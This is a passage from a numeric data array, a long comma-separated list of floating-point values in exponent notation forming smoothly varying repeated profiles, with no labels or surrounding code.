-0.66281413e-03,
-0.26719193e-02,
-0.38054741e-02,
-0.47028475e-02,
-0.58184257e-02,
-0.71222009e-02,
-0.85073700e-02,
-0.10002246e-01,
-0.11745773e-01,
-0.14030821e-01,
-0.16646272e-01,
-0.17007222e-01,
0.20113155e-01,
0.22637051e-01,
0.25786523e-01,
0.29021049e-01,
0.31953044e-01,
0.34343820e-01,
0.36122233e-01,
0.37356097e-01,
0.38174324e-01,
0.38693711e-01,
0.38991190e-01,
0.39110996e-01,
0.39079025e-01,
0.38912032e-01,
0.38622018e-01,
0.38218360e-01,
0.37708975e-01,
0.37100986e-01,
0.36401182e-01,
0.35616249e-01,
0.34752883e-01,
0.33817910e-01,
0.32818370e-01,
0.31761579e-01,
0.30655265e-01,
0.29507659e-01,
0.28327364e-01,
0.27123058e-01,
0.25902657e-01,
0.24672238e-01,
0.23434937e-01,
0.22190256e-01,
0.20934626e-01,
0.19663457e-01,
0.18373784e-01,
0.17065847e-01,
0.15741942e-01,
0.14402619e-01,
0.13038933e-01,
0.11620902e-01,
0.10082259e-01,
0.83062556e-02,
0.61375611e-02,
0.34738728e-02,
0.47380762e-03,
-0.23008718e-02,
-0.42078327e-02,
-0.52424278e-02,
-0.60545313e-02,
-0.70956550e-02,
-0.83303098e-02,
-0.96523445e-02,
-0.11092181e-01,
-0.12791218e-01,
-0.15045415e-01,
-0.17619489e-01,
-0.17940814e-01,
0.18581720e-01,
0.20915883e-01,
0.23829265e-01,
0.26822245e-01,
0.29536562e-01,
0.31751547e-01,
0.33401374e-01,
0.34548633e-01,
0.35312355e-01,
0.35800364e-01,
0.36083620e-01,
0.36202855e-01,
0.36181841e-01,
0.36035892e-01,
0.35775941e-01,
0.35410490e-01,
0.34946699e-01,
0.34391019e-01,
0.33749603e-01,
0.33028524e-01,
0.32233991e-01,
0.31372394e-01,
0.30450473e-01,
0.29475490e-01,
0.28455326e-01,
0.27398327e-01,
0.26312927e-01,
0.25206672e-01,
0.24085123e-01,
0.22950860e-01,
0.21803081e-01,
0.20638589e-01,
0.19453924e-01,
0.18248010e-01,
0.17023819e-01,
0.15788162e-01,
0.14549590e-01,
0.13314429e-01,
0.12082065e-01,
0.10838719e-01,
0.95478874e-02,
0.81366943e-02,
0.64820210e-02,
0.44224774e-02,
0.18523625e-02,
-0.10648414e-02,
-0.37534775e-02,
-0.55650654e-02,
-0.65100682e-02,
-0.72507914e-02,
-0.82312562e-02,
-0.94086677e-02,
-0.10678349e-01,
-0.12073795e-01,
-0.13739666e-01,
-0.15975196e-01,
-0.18515551e-01,
-0.18804787e-01,
0.17168749e-01,
0.19327780e-01,
0.22023177e-01,
0.24793051e-01,
0.27306184e-01,
0.29358532e-01,
0.30889180e-01,
0.31955894e-01,
0.32668613e-01,
0.33126883e-01,
0.33396173e-01,
0.33513986e-01,
0.33502162e-01,
0.33374704e-01,
0.33141572e-01,
0.32810479e-01,
0.32387879e-01,
0.31879608e-01,
0.31291280e-01,
0.30628527e-01,
0.29897207e-01,
0.29103544e-01,
0.28254325e-01,
0.27356898e-01,
0.26419124e-01,
0.25448931e-01,
0.24453351e-01,
0.23437385e-01,
0.22403084e-01,
0.21349376e-01,
0.20273272e-01,
0.19171963e-01,
0.18045446e-01,
0.16897894e-01,
0.15737535e-01,
0.14574960e-01,
0.13420397e-01,
0.12280968e-01,
0.11158198e-01,
0.10045296e-01,
0.89227157e-02,
0.77492185e-02,
0.64479085e-02,
0.48916428e-02,
0.29151232e-02,
0.41272587e-03,
-0.24413855e-02,
-0.50533284e-02,
-0.67725605e-02,
-0.76342914e-02,
-0.83150435e-02,
-0.92462925e-02,
-0.10376302e-01,
-0.11603034e-01,
-0.12963645e-01,
-0.14606736e-01,
-0.16835131e-01,
-0.19348454e-01,
-0.19612487e-01,
0.15865134e-01,
0.17862506e-01,
0.20356622e-01,
0.22920400e-01,
0.25247563e-01,
0.27149413e-01,
0.28569562e-01,
0.29561354e-01,
0.30226331e-01,
0.30656436e-01,
0.30912070e-01,
0.31027781e-01,
0.31023609e-01,
0.30912362e-01,
0.30703111e-01,
0.30402854e-01,
0.30017478e-01,
0.29552329e-01,
0.29012615e-01,
0.28403712e-01,
0.27731372e-01,
0.27001891e-01,
0.26222091e-01,
0.25399221e-01,
0.24540421e-01,
0.23651907e-01,
0.22738006e-01,
0.21800319e-01,
0.20837659e-01,
0.19847298e-01,
0.18827075e-01,
0.17777784e-01,
0.16704248e-01,
0.15615269e-01,
0.14521973e-01,
0.13435473e-01,
0.12364727e-01,
0.11315233e-01,
0.10288181e-01,
0.92796814e-02,
0.82787825e-02,
0.72630350e-02,
0.61889994e-02,
0.49772034e-02,
0.34969368e-02,
0.15794969e-02,
-0.87806711e-03,
-0.36851568e-02,
-0.62257764e-02,
-0.78527220e-02,
-0.86356523e-02,
-0.92662042e-02,
-0.10158284e-01,
-0.11249557e-01,
-0.12441714e-01,
-0.13776368e-01,
-0.15406553e-01,
-0.17638773e-01,
-0.20130811e-01,
-0.20375945e-01,
0.14662431e-01,
0.16510550e-01,
0.18818781e-01,
0.21192145e-01,
0.23347380e-01,
0.25109937e-01,
0.26427617e-01,
0.27349673e-01,
0.27969934e-01,
0.28373329e-01,
0.28615609e-01,
0.28728599e-01,
0.28730700e-01,
0.28633634e-01,
0.28445678e-01,
0.28173234e-01,
0.27821736e-01,
0.27396221e-01,
0.26901733e-01,
0.26343603e-01,
0.25727598e-01,
0.25059966e-01,
0.24347208e-01,
0.23595579e-01,
0.22810331e-01,
0.21994932e-01,
0.21150416e-01,
0.20275565e-01,
0.19368108e-01,
0.18426621e-01,
0.17452605e-01,
0.16451407e-01,
0.15432071e-01,
0.14405738e-01,
0.13383573e-01,
0.12374919e-01,
0.11386278e-01,
0.10420920e-01,
0.94791828e-02,
0.85583618e-02,
0.76520443e-02,
0.67478423e-02,
0.58222217e-02,
0.48302943e-02,
0.36898023e-02,
0.22657616e-02,
0.38620809e-03,
-0.20464570e-02,
-0.48193890e-02,
-0.72907535e-02,
-0.88232690e-02,
-0.95311515e-02,
-0.10120570e-01,
-0.10982438e-01,
-0.12042844e-01,
-0.13208187e-01,
-0.14525170e-01,
-0.16151898e-01,
-0.18398402e-01,
-0.20873869e-01,
-0.21105917e-01,
0.13552637e-01,
0.15262923e-01,
0.17399436e-01,
0.19596824e-01,
0.21593064e-01,
0.23226669e-01,
0.24449309e-01,
0.25306473e-01,
0.25884863e-01,
0.26262935e-01,
0.26492154e-01,
0.26601870e-01,
0.26609030e-01,
0.26524415e-01,
0.26355645e-01,
0.26108669e-01,
0.25788641e-01,
0.25400463e-01,
0.24949163e-01,
0.24440058e-01,
0.23878768e-01,
0.23270955e-01,
0.22621866e-01,
0.21935685e-01,
0.21214921e-01,
0.20460036e-01,
0.19669790e-01,
0.18842377e-01,
0.17977156e-01,
0.17076379e-01,
0.16145866e-01,
0.15194753e-01,
0.14234038e-01,
0.13274660e-01,
0.12325864e-01,
0.11394359e-01,
0.10484057e-01,
0.95965564e-02,
0.87314118e-02,
0.78865895e-02,
0.70581776e-02,
0.62391688e-02,
0.54168063e-02,
0.45667454e-02,
0.36422682e-02,
0.25576062e-02,
0.11724485e-02,
-0.68855018e-03,
-0.31142109e-02,
-0.58629848e-02,
-0.82644373e-02,
-0.96990969e-02,
-0.10335494e-01,
-0.10892544e-01,
-0.11732457e-01,
-0.12769138e-01,
-0.13914877e-01,
-0.15221934e-01,
-0.16854212e-01,
-0.19125070e-01,
-0.21587910e-01,
-0.21812512e-01,
0.12528375e-01,
0.14111324e-01,
0.16089143e-01,
0.18123835e-01,
0.19972973e-01,
0.21487134e-01,
0.22621555e-01,
0.23418266e-01,
0.23957409e-01,
0.24311502e-01,
0.24528088e-01,
0.24634261e-01,
0.24645658e-01,
0.24572272e-01,
0.24421265e-01,
0.24198342e-01,
0.23908518e-01,
0.23556618e-01,
0.23147549e-01,
0.22686291e-01,
0.22177676e-01,
0.21625938e-01,
0.21034168e-01,
0.20403879e-01,
0.19734910e-01,
0.19025959e-01,
0.18275727e-01,
0.17484382e-01,
0.16654858e-01,
0.15793348e-01,
0.14909030e-01,
0.14012692e-01,
0.13114928e-01,
0.12224767e-01,
0.11348879e-01,
0.10491370e-01,
0.96542966e-02,
0.88380333e-02,
0.80419006e-02,
0.72643128e-02,
0.65027624e-02,
0.57532680e-02,
0.50087180e-02,
0.42559886e-02,
0.34697335e-02,
0.26006724e-02,
0.15582409e-02,
0.19586713e-03,
-0.16648462e-02,
-0.41000666e-02,
-0.68322704e-02,
-0.91604441e-02,
-0.10493010e-01,
-0.11061922e-01,
-0.11595163e-01,
-0.12420692e-01,
-0.13440105e-01,
-0.14572812e-01,
-0.15877264e-01,
-0.17524028e-01,
-0.19829245e-01,
-0.22282675e-01,
-0.22505168e-01,
0.11582712e-01,
0.13047962e-01,
0.14879054e-01,
0.16763248e-01,
0.18476224e-01,
0.19879704e-01,
0.20932244e-01,
0.21672688e-01,
0.22175148e-01,
0.22506684e-01,
0.22711273e-01,
0.22814000e-01,
0.22829419e-01,
0.22766909e-01,
0.22633271e-01,
0.22434004e-01,
0.22174012e-01,
0.21857906e-01,
0.21490037e-01,
0.21074377e-01,
0.20614149e-01,
0.20111440e-01,
0.19566908e-01,
0.18979838e-01,
0.18348834e-01,
0.17672971e-01,
0.16953107e-01,
0.16192837e-01,
0.15398719e-01,
0.14579884e-01,
0.13746735e-01,
0.12909485e-01,
0.12076905e-01,
0.11255554e-01,
0.10449625e-01,
0.96614184e-02,
0.88916803e-02,
0.81402799e-02,
0.74064764e-02,
0.66891308e-02,
0.59866421e-02,
0.52965824e-02,
0.46150312e-02,
0.39348379e-02,
0.32422331e-02,
0.25101355e-02,
0.16859862e-02,
0.67323016e-03,
-0.68223715e-03,
-0.25608686e-02,
-0.50209761e-02,
-0.77415816e-02,
-0.99905552e-02,
-0.11216282e-01,
-0.11722405e-01,
-0.12240239e-01,
-0.13058126e-01,
-0.14066087e-01,
-0.15192053e-01,
-0.16501144e-01,
-0.18171404e-01,
-0.20520791e-01,
-0.22966992e-01,
-0.23192288e-01,
0.10709423e-01,
0.12065823e-01,
0.13761187e-01,
0.15506121e-01,
0.17093049e-01,
0.18394005e-01,
0.19370625e-01,
0.20058842e-01,
0.20527244e-01,
0.20837912e-01,
0.21031609e-01,
0.21131653e-01,
0.21151649e-01,
0.21100447e-01,
0.20984545e-01,
0.20809161e-01,
0.20578744e-01,
0.20297162e-01,
0.19967660e-01,
0.19592566e-01,
0.19173032e-01,
0.18708948e-01,
0.18199200e-01,
0.17642427e-01,
0.17038029e-01,
0.16387362e-01,
0.15694451e-01,
0.14966104e-01,
0.14211375e-01,
0.13440318e-01,
0.12662663e-01,
0.11886760e-01,
0.11119010e-01,
0.10363686e-01,
0.96232807e-02,
0.88988189e-02,
0.81905108e-02,
0.74980101e-02,
0.68207132e-02,
0.61578541e-02,
0.55083996e-02,
0.48709009e-02,
0.42431629e-02,
0.36212225e-02,
0.29974312e-02,
0.23571376e-02,
0.16709621e-02,
0.88186091e-03,
-0.11385441e-03,
-0.14786492e-02,
-0.33936626e-02,
-0.58928211e-02,
-0.86036716e-02,
-0.10764806e-01,
-0.11878857e-01,
-0.12327690e-01,
-0.12838322e-01,
-0.13654754e-01,
-0.14656777e-01,
-0.15782116e-01,
-0.17102929e-01,
-0.18805560e-01,
-0.21208614e-01,
-0.23648826e-01,
-0.23881109e-01,
0.99031366e-02,
0.11158862e-01,
0.12728675e-01,
0.14344782e-01,
0.15815102e-01,
0.17021233e-01,
0.17927697e-01,
0.18567791e-01,
0.19005040e-01,
0.19296985e-01,
0.19481450e-01,
0.19580156e-01,
0.19605840e-01,
0.19566806e-01,
0.19469030e-01,
0.19317091e-01,
0.19114554e-01,
0.18864036e-01,
0.18567108e-01,
0.18224217e-01,
0.17834747e-01,
0.17397350e-01,
0.16910696e-01,
0.16374495e-01,
0.15790507e-01,
0.15163027e-01,
0.14498919e-01,
0.13806998e-01,
0.13096904e-01,
0.12377877e-01,
0.11657882e-01,
0.10943062e-01,
0.10237600e-01,
0.95441425e-02,
0.88640014e-02,
0.81976959e-02,
0.75451867e-02,
0.69061988e-02,
0.62803319e-02,
0.56670737e-02,
0.50658169e-02,
0.44758078e-02,
0.38957228e-02,
0.33232321e-02,
0.27542519e-02,
0.21804536e-02,
0.15856215e-02,
0.93752530e-03,
0.17370789e-03,
-0.81816822e-03,
-0.22095586e-02,
-0.41797617e-02,
-0.67304755e-02,
-0.94296988e-02,
-0.11491459e-01,
-0.12489353e-01,
-0.12887697e-01,
-0.13399359e-01,
-0.14220017e-01,
-0.15221213e-01,
-0.16351623e-01,
-0.17690992e-01,
-0.19434931e-01,
-0.21900531e-01,
-0.24334403e-01,
-0.24576908e-01,
0.91596041e-02,
0.10322293e-01,
0.11776099e-01,
0.13273214e-01,
0.14635916e-01,
0.15754675e-01,
0.16596718e-01,
0.17192930e-01,
0.17602194e-01,
0.17877869e-01,
0.18055072e-01,
0.18153975e-01,
0.18186348e-01,
0.18159697e-01,
0.18079169e-01,
0.17948311e-01,
0.17769367e-01,
0.17543392e-01,
0.17270328e-01,
0.16949220e-01,
0.16578663e-01,
0.16157566e-01,
0.15685990e-01,
0.15165905e-01,
0.14601668e-01,
0.14000042e-01,
0.13369541e-01,
0.12719298e-01,
0.12057992e-01,
0.11393145e-01,
0.10730589e-01,
0.10074451e-01,
0.94274255e-02,
0.87909503e-02,
0.81658233e-02,
0.75523388e-02,
0.69505223e-02,
0.63602584e-02,
0.57813367e-02,
0.52134916e-02,
0.46564899e-02,
0.41098930e-02,
0.35728957e-02,
0.30442516e-02,
0.25214758e-02,
0.19998695e-02,
0.14702382e-02,
0.91451913e-03,
0.29673893e-03,
-0.45211281e-03,
-0.14543475e-02,
-0.28908835e-02,
-0.49353936e-02,
-0.75476863e-02,
-0.10228912e-01,
-0.12177330e-01,
-0.13055839e-01,
-0.13411977e-01,
-0.13932705e-01,
-0.14762470e-01,
-0.15767431e-01,
-0.16908331e-01,
-0.18272618e-01,
-0.20066334e-01,
-0.22602497e-01,
-0.25027955e-01,
-0.25282444e-01,
0.84757134e-02,
0.95526502e-02,
0.10899562e-01,
0.12287115e-01,
0.13550865e-01,
0.14589507e-01,
0.15372781e-01,
0.15929360e-01,
0.16313823e-01,
0.16575595e-01,
0.16747160e-01,
0.16847055e-01,
0.16885890e-01,
0.16870106e-01,
0.16803687e-01,
0.16688865e-01,
0.16526472e-01,
0.16316228e-01,
0.16057082e-01,
0.15747746e-01,
0.15387391e-01,
0.14976392e-01,
0.14516956e-01,
0.14013476e-01,
0.13472388e-01,
0.12901680e-01,
0.12309901e-01,
0.11705250e-01,
0.11094769e-01,
0.10483908e-01,
0.98766321e-02,
0.92755975e-02,
0.86824028e-02,
0.80980305e-02,
0.75229523e-02,
0.69574793e-02,
0.64018168e-02,
0.58560292e-02,
0.53201127e-02,
0.47941157e-02,
0.42779413e-02,
0.37713288e-02,
0.32739611e-02,
0.27850254e-02,
0.23029358e-02,
0.18249402e-02,
0.13457378e-02,
0.85484359e-03,
0.33187922e-03,
-0.26360160e-03,
-0.10086164e-02,
-0.20368681e-02,
-0.35384803e-02,
-0.56763412e-02,
-0.83571654e-02,
-0.11009140e-01,
-0.12828228e-01,
-0.13585953e-01,
-0.13909469e-01,
-0.14446771e-01,
-0.15289789e-01,
-0.16302353e-01,
-0.17458308e-01,
-0.18853234e-01,
-0.20704713e-01,
-0.23318050e-01,
-0.25730822e-01,
-0.25997423e-01,
0.78488868e-02,
0.88471249e-02,
0.10095963e-01,
0.11383073e-01,
0.12556248e-01,
0.13521745e-01,
0.14251599e-01,
0.14772387e-01,
0.15134628e-01,
0.15383984e-01,
0.15550311e-01,
0.15650392e-01,
0.15693463e-01,
0.15684696e-01,
0.15626790e-01,
0.15520756e-01,
0.15366406e-01,
0.15162837e-01,
0.14909022e-01,
0.14604477e-01,
0.14249890e-01,
0.13847613e-01,
0.13401926e-01,
0.12918934e-01,
0.12406076e-01,
0.11871213e-01,
0.11321891e-01,
0.10764673e-01,
0.10204747e-01,
0.96458644e-02,
0.90905391e-02,
0.85403854e-02,
0.79964781e-02,
0.74595166e-02,
0.69300104e-02,
0.64083328e-02,
0.58948221e-02,
0.53897803e-02,
0.48935004e-02,
0.44061504e-02,
0.39277528e-02,
0.34583132e-02,
0.29976317e-02,
0.25451381e-02,
0.20998786e-02,
0.16600611e-02,
0.12224072e-02,
0.78081363e-03,
0.32335857e-03,
-0.17330737e-03,
-0.75507897e-03,
-0.15084407e-02,
-0.25801368e-02,
-0.41686138e-02,
-0.64185774e-02,
-0.91707250e-02,
-0.11776590e-01,
-0.13448806e-01,
-0.14086716e-01,
-0.14388485e-01,
-0.14948927e-01,
-0.15807996e-01,
-0.16831016e-01,
-0.18005654e-01,
-0.19435892e-01,
-0.21352261e-01,
-0.24047775e-01,
-0.26441328e-01,
-0.26718097e-01,
0.72761136e-02,
0.82024941e-02,
0.93617616e-02,
0.10557142e-01,
0.11647610e-01,
0.12546310e-01,
0.13227314e-01,
0.13715181e-01,
0.14056569e-01,
0.14293512e-01,
0.14453239e-01,
0.14550695e-01,
0.14593684e-01,
0.14586142e-01,
0.14529741e-01,
0.14424738e-01,
0.14270628e-01,
0.14066807e-01,
0.13813181e-01,
0.13510717e-01,
0.13161879e-01,
0.12770806e-01,
0.12343196e-01,
0.11885820e-01,
0.11405828e-01,
0.10910179e-01,
0.10404940e-01,
0.98949000e-02,
0.93836067e-02,
0.88735307e-02,
0.83662188e-02,
0.78627151e-02,
0.73637851e-02,
0.68700551e-02,
0.63821264e-02,
0.59005306e-02,
0.54257177e-02,
0.49582440e-02,
0.44985944e-02,
0.40470236e-02,
0.36037776e-02,
0.31689804e-02,
0.27423929e-02,
0.23237155e-02,
0.19122795e-02,
0.15068311e-02,
0.11052121e-02,
0.70368673e-03,
0.29509133e-03,
-0.13425731e-03,
-0.61128259e-03,
-0.11886779e-02,
-0.19643204e-02,
-0.30994283e-02,
-0.47985963e-02,
-0.71782242e-02,
-0.99987285e-02,
-0.12535306e-01,
-0.14042607e-01,
-0.14564627e-01,
-0.14856030e-01,
-0.15444703e-01,
-0.16321121e-01,
-0.17356047e-01,
-0.18551625e-01,
-0.20020738e-01,
-0.22008330e-01,
-0.24788912e-01,
-0.27153788e-01,
-0.27435988e-01,
0.67528659e-02,
0.76138428e-02,
0.86914934e-02,
0.98031582e-02,
0.10817948e-01,
0.11655207e-01,
0.12290766e-01,
0.12747228e-01,
0.13067597e-01,
0.13290452e-01,
0.13440499e-01,
0.13530949e-01,
0.13568352e-01,
0.13555742e-01,
0.13494246e-01,
0.13384038e-01,
0.13225075e-01,
0.13017694e-01,
0.12763139e-01,
0.12463950e-01,
0.12124085e-01,
0.11748808e-01,
0.11344243e-01,
0.10916842e-01,
0.10472860e-01,
0.10017826e-01,
0.95562525e-02,
0.90915291e-02,
0.86259460e-02,
0.81609664e-02,
0.76976661e-02,
0.72367843e-02,
0.67789229e-02,
0.63247578e-02,
0.58749435e-02,
0.54301512e-02,
0.49911011e-02,
0.45584417e-02,
0.41327197e-02,
0.37144551e-02,
0.33040245e-02,
0.29014633e-02,
0.25067537e-02,
0.21196145e-02,
0.17395143e-02,
0.13655368e-02,
0.99622435e-03,
0.62900473e-03,
0.25951708e-03,
-0.12054403e-03,
-0.52714220e-03,
-0.99177333e-03,
-0.15755766e-02,
-0.23898906e-02,
-0.36114564e-02,
-0.54468848e-02,
-0.79709487e-02,
-0.10849346e-01,
-0.13287026e-01,
-0.14611776e-01,
-0.15024997e-01,
-0.15317407e-01,
-0.15937271e-01,
-0.16830366e-01,
-0.17877102e-01,
-0.19094490e-01,
-0.20604689e-01,
-0.22668475e-01,
-0.25534086e-01,
-0.27857255e-01,
-0.28136132e-01,
0.62725060e-02,
0.70738452e-02,
0.80769034e-02,
0.91117928e-02,
0.10056756e-01,
0.10836687e-01,
0.11428916e-01,
0.11854174e-01,
0.12152059e-01,
0.12357980e-01,
0.12494393e-01,
0.12573079e-01,
0.12599719e-01,
0.12576928e-01,
0.12505878e-01,
0.12387235e-01,
0.12221836e-01,
0.12011216e-01,
0.11757963e-01,
0.11465836e-01,
0.11139663e-01,
0.10784952e-01,
0.10407481e-01,
0.10012860e-01,
0.96060764e-02,
0.91912504e-02,
0.87715685e-02,
0.83493032e-02,
0.79259127e-02,
0.75023416e-02,
0.70792502e-02,
0.66572730e-02,
0.62370505e-02,
0.58192150e-02,
0.54045119e-02,
0.49937805e-02,
0.45878929e-02,
0.41875835e-02,
0.37935111e-02,
0.34063701e-02,
0.30265125e-02,
0.26541308e-02,
0.22892184e-02,
0.19315761e-02,
0.15806772e-02,
0.12358783e-02,
0.89602108e-03,
0.55933301e-03,
0.22290465e-03,
-0.11837736e-03,
-0.47439354e-03,
-0.86409569e-03,
-0.13247277e-02,
-0.19277434e-02,
-0.28001412e-02,
-0.41344408e-02,
-0.61328700e-02,
-0.88115418e-02,
-0.11727598e-01,
-0.14030309e-01,
-0.15156906e-01,
-0.15471662e-01,
-0.15775396e-01,
-0.16426805e-01,
-0.17333917e-01,
-0.18390546e-01,
-0.19628605e-01,
-0.21180209e-01,
-0.23323257e-01,
-0.26269557e-01,
-0.28532716e-01,
-0.28793098e-01,
0.58267605e-02,
0.65732352e-02,
0.75074541e-02,
0.84711155e-02,
0.93507199e-02,
0.10076155e-01,
0.10626074e-01,
0.11019482e-01,
0.11292907e-01,
0.11478950e-01,
0.11598186e-01,
0.11661368e-01,
0.11673780e-01,
0.11638117e-01,
0.11556003e-01,
0.11428879e-01,
0.11258594e-01,
0.11047787e-01,
0.10800015e-01,
0.10519676e-01,
0.10211711e-01,
0.98812887e-02,
0.95334202e-02,
0.91725811e-02,
0.88025127e-02,
0.84261857e-02,
0.80457665e-02,
0.76626753e-02,
0.72779190e-02,
0.68921465e-02,
0.65058237e-02,
0.61194906e-02,
0.57338160e-02,
0.53495029e-02,
0.49673491e-02,
0.45883162e-02,
0.42133094e-02,
0.38431743e-02,
0.34787988e-02,
0.31207474e-02,
0.27695056e-02,
0.24253791e-02,
0.20884008e-02,
0.17583206e-02,
0.14347950e-02,
0.11171702e-02,
0.80453861e-03,
0.49563375e-03,
0.18838409e-03,
-0.12067244e-03,
-0.43773217e-03,
-0.77462569e-03,
-0.11541138e-02,
-0.16205981e-02,
-0.22580458e-02,
-0.32116263e-02,
-0.46886820e-02,
-0.68765748e-02,
-0.97123422e-02,
-0.12634131e-01,
-0.14760367e-01,
-0.15676778e-01,
-0.15906356e-01,
-0.16229935e-01,
-0.16910229e-01,
-0.17826060e-01,
-0.18888203e-01,
-0.20143216e-01,
-0.21733690e-01,
-0.23955522e-01,
-0.26971251e-01,
-0.29147699e-01,
-0.29363733e-01,
0.54070717e-02,
0.61022816e-02,
0.69719772e-02,
0.78685069e-02,
0.86859381e-02,
0.93587395e-02,
0.98667927e-02,
0.10227575e-01,
0.10474904e-01,
0.10638993e-01,
0.10738960e-01,
0.10784928e-01,
0.10782113e-01,
0.10733562e-01,
0.10641565e-01,
0.10508422e-01,
0.10336863e-01,
0.10130250e-01,
0.98925652e-02,
0.96282410e-02,
0.93418919e-02,
0.90379883e-02,
0.87205544e-02,
0.83929868e-02,
0.80580246e-02,
0.77177160e-02,
0.73734652e-02,
0.70262798e-02,
0.66767824e-02,
0.63254600e-02,
0.59727905e-02,
0.56192488e-02,
0.52654315e-02,
0.49121627e-02,
0.45603677e-02,
0.42109452e-02,
0.38648082e-02,
0.35230482e-02,
0.31864857e-02,
0.28557458e-02,
0.25313764e-02,
0.22137545e-02,
0.19029069e-02,
0.15987142e-02,
0.13008172e-02,
0.10086106e-02,
0.72139426e-03,
0.43811998e-03,
0.15723592e-03,
-0.12376621e-03,
-0.40906059e-03,
-0.70619176e-03,
-0.10294477e-02,
-0.14063339e-02,
-0.18904223e-02,
-0.25809507e-02,
-0.36431164e-02,
-0.52961027e-02,
-0.76976335e-02,
-0.10682030e-01,
-0.13564016e-01,
-0.15468677e-01,
-0.16168477e-01,
-0.16328586e-01,
-0.16677296e-01,
-0.17379910e-01,
-0.18295975e-01,
-0.19355783e-01,
-0.20619802e-01,
-0.22241637e-01,
-0.24535159e-01,
-0.27597541e-01,
-0.29646901e-01,
-0.29775085e-01,
0.50061666e-02,
0.56525916e-02,
0.64607500e-02,
0.72929878e-02,
0.80504669e-02,
0.86719748e-02,
0.91386139e-02,
0.94665419e-02,
0.96872011e-02,
0.98287789e-02,
0.99092564e-02,
0.99384002e-02,
0.99215917e-02,
0.98623503e-02,
0.97636050e-02,
0.96283276e-02,
0.94598122e-02,
0.92617264e-02,
0.90380237e-02,
0.87927980e-02,
0.85300365e-02,
0.82533574e-02,
0.79658525e-02,
0.76700603e-02,
0.73679010e-02,
0.70607387e-02,
0.67495992e-02,
0.64351326e-02,
0.61177979e-02,
0.57979897e-02,
0.54761712e-02,
0.51528304e-02,
0.48285746e-02,
0.45042443e-02,
0.41807955e-02,
0.38590934e-02,
0.35402139e-02,
0.32251289e-02,
0.29146906e-02,
0.26096692e-02,
0.23106080e-02,
0.20178384e-02,
0.17315357e-02,
0.14516271e-02,
0.11777402e-02,
0.90943626e-03,
0.64600032e-03,
0.38659063e-03,
0.12990853e-03,
-0.12597593e-03,
-0.38408191e-03,
-0.64947037e-03,
-0.93128323e-03,
-0.12469848e-02,
-0.16304143e-02,
-0.21464191e-02,
-0.29125693e-02,
-0.41156993e-02,
-0.59804209e-02,
-0.86140092e-02,
-0.11723425e-01,
-0.14505944e-01,
-0.16143575e-01,
-0.16627248e-01,
-0.16734317e-01,
-0.17108738e-01,
-0.17822174e-01,
-0.18725207e-01,
-0.19769130e-01,
-0.21026963e-01,
-0.22663718e-01,
-0.25009871e-01,
-0.28077208e-01,
-0.29936161e-01,
-0.29903086e-01,
0.46191481e-02,
0.52183974e-02,
0.59670168e-02,
0.67369491e-02,
0.74361749e-02,
0.80076661e-02,
0.84337806e-02,
0.87295286e-02,
0.89242216e-02,
0.90442616e-02,
0.91067078e-02,
0.91211265e-02,
0.90931328e-02,
0.90266792e-02,
0.89251632e-02,
0.87919217e-02,
0.86304275e-02,
0.84443204e-02,
0.82372911e-02,
0.80128787e-02,
0.77742967e-02,
0.75243628e-02,
0.72654327e-02,
0.69993068e-02,
0.67273136e-02,
0.64504785e-02,
0.61694812e-02,
0.58848094e-02,
0.55968449e-02,
0.53059584e-02,
0.50125136e-02,
0.47170832e-02,
0.44203578e-02,
0.41231164e-02,
0.38261772e-02,
0.35306206e-02,
0.32374398e-02,
0.29475170e-02,
0.26617502e-02,
0.23809616e-02,
0.21057320e-02,
0.18363672e-02,
0.15731406e-02,
0.13160043e-02,
0.10647054e-02,
0.81881043e-03,
0.57776505e-03,
0.34065990e-03,
0.10639309e-03,
-0.12660332e-03,
-0.36068761e-03,
-0.59937662e-03,
-0.84880623e-03,
-0.11204274e-02,
-0.14357190e-02,
-0.18365043e-02,
-0.24020236e-02,
-0.32714859e-02,
-0.46532732e-02,
-0.67663151e-02,
-0.96402615e-02,
-0.12831893e-01,
-0.15441692e-01,
-0.16770078e-01,
-0.17045652e-01,
-0.17114457e-01,
-0.17508077e-01,
-0.18213695e-01,
-0.19082699e-01,
-0.20087397e-01,
-0.21311399e-01,
-0.22931056e-01,
-0.25289452e-01,
-0.28288210e-01,
-0.29855460e-01,
-0.29540431e-01,
0.42438372e-02,
0.47970237e-02,
0.54875640e-02,
0.61967750e-02,
0.68393080e-02,
0.73622656e-02,
0.77493028e-02,
0.80144051e-02,
0.81849089e-02,
0.82855793e-02,
0.83326427e-02,
0.83354777e-02,
0.82998471e-02,
0.82299737e-02,
0.81294924e-02,
0.80018509e-02,
0.78504579e-02,
0.76786745e-02,
0.74897227e-02,
0.72865360e-02,
0.70716739e-02,
0.68472759e-02,
0.66150147e-02,
0.63761803e-02,
0.61317808e-02,
0.58825328e-02,
0.56289569e-02,
0.53714588e-02,
0.51103933e-02,
0.48460537e-02,
0.45788516e-02,
0.43093446e-02,
0.40383078e-02,
0.37663926e-02,
0.34944667e-02,
0.32235801e-02,
0.29546390e-02,
0.26885115e-02,
0.24261076e-02,
0.21682207e-02,
0.19154118e-02,
0.16681626e-02,
0.14266440e-02,
0.11909056e-02,
0.96084451e-03,
0.73608221e-03,
0.51601185e-03,
0.29983022e-03,
0.86455977e-04,
-0.12548176e-03,
-0.33780126e-03,
-0.55322744e-03,
-0.77611348e-03,
-0.10140111e-02,
-0.12810014e-02,
-0.16041107e-02,
-0.20356334e-02,
-0.26726879e-02,
-0.36793316e-02,
-0.52829208e-02,
-0.76788506e-02,
-0.10785309e-01,
-0.13992673e-01,
-0.16345447e-01,
-0.17329855e-01,
-0.17411666e-01,
-0.17451219e-01,
-0.17846853e-01,
-0.18514944e-01,
-0.19316018e-01,
-0.20241588e-01,
-0.21382602e-01,
-0.22925586e-01,
-0.25219092e-01,
-0.28025590e-01,
-0.29143283e-01,
-0.28364539e-01,
0.38802244e-02,
0.43883347e-02,
0.50221425e-02,
0.56721950e-02,
0.62597329e-02,
0.67359642e-02,
0.70858784e-02,
0.73225168e-02,
0.74713244e-02,
0.75554666e-02,
0.75903148e-02,
0.75849718e-02,
0.75452076e-02,
0.74753161e-02,
0.73789642e-02,
0.72595305e-02,
0.71201995e-02,
0.69639226e-02,
0.67933705e-02,
0.66109342e-02,
0.64186375e-02,
0.62180408e-02,
0.60103335e-02,
0.57964721e-02,
0.55771875e-02,
0.53530186e-02,
0.51244237e-02,
0.48917811e-02,
0.46553644e-02,
0.44155009e-02,
0.41726306e-02,
0.39273482e-02,
0.36802413e-02,
0.34321158e-02,
0.31838417e-02,
0.29362249e-02,
0.26901832e-02,
0.24466240e-02,
0.22063667e-02,
